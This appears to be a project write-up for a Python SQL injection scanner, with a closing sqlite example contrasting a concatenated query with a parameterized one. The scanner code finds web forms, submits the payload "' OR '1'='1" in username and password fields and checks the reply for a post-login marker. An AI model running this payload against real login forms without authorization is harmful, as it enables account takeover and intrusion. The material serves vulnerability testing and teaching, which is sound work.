SQLInjectionScanner


Project Overview

Automates detection of SQL injection vulnerabilities by parsing web forms, injecting payloads, and analyzing HTTP responses for error signatures or bypass indicators.

Form Discovery

Uses BeautifulSoup to locate forms on the page:

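import requests
from bs4 import BeautifulSoup
s = requests.Session()  # one session, so cookies persist across requests
resp = s.get(url)       # url: the page being scanned
soup = BeautifulSoup(resp.content, "html.parser")
forms = soup.find_all("form")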

Returns each <form> element for further analysis.

Payload Construction

Extracts form details, then builds a data dictionary that injects "' OR '1'='1" into input fields named user, username or password:

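data = {}
for field in details['inputs']:
    name = field.get('name')
    if not name:
        continue  # an input without a name is never submitted
    if name.lower() in ('user', 'username', 'password'):
        data[name] = "' OR '1'='1"  # injection payload
    elif field.get('type') == 'hidden' or field.get('value'):
        data[name] = field.get('value') or ''  # keep hidden / pre-filled values
    else:
        data[name] = 'testing'  # dummy value for everything else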

Preserves hidden fields and assigns dummy values to others.

Attack Execution & Analysis

Sends the crafted payload via GET or POST and inspects the response body:

# Submit the form the same way the page would
if method == 'post':
    resp = s.post(action_url, data=data)
else:
    resp = s.get(action_url, params=data)
# Case-insensitive search for the post-login marker
body = resp.text.lower()
if 'sign off' in body:
    print("Authentication bypass detected")
else:
    print("No bypass detected")

Flags a successful bypass when the response contains known post-login markers (e.g., "Sign Off").
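
Why the payload produces that marker, and what stops it, shown as an added example that is not part of the SQLInjectionScanner code. The in-memory database, the sample account, the function names and the two response bodies are constructed for illustration; only the payload and the "sign off" check come from the snippets above.

```python
import sqlite3

PAYLOAD = "' OR '1'='1"  # the string the scanner submits

def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    # Vulnerable: input becomes part of the SQL text. The leading quote in
    # the payload closes the string literal, and the trailing OR '1'='1'
    # makes the WHERE clause true for every row.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Hardened: placeholders keep input as data, so the payload is compared
    # literally against the stored values and matches nothing.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def render(logged_in):
    # Hypothetical response bodies; "Sign Off" is the post-login marker.
    if logged_in:
        return "<a href='/logout'>Sign Off</a>"
    return "<h1>Login Failed</h1>"

def scanner_verdict(login):
    # The same check the scanner applies to the response body.
    body = render(login(make_db(), PAYLOAD, PAYLOAD)).lower()
    return "sign off" in body

if __name__ == "__main__":
    print("concatenated query bypassed: ", scanner_verdict(login_concatenated))
    print("parameterized query bypassed:", scanner_verdict(login_parameterized))
```
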

Key Takeaways
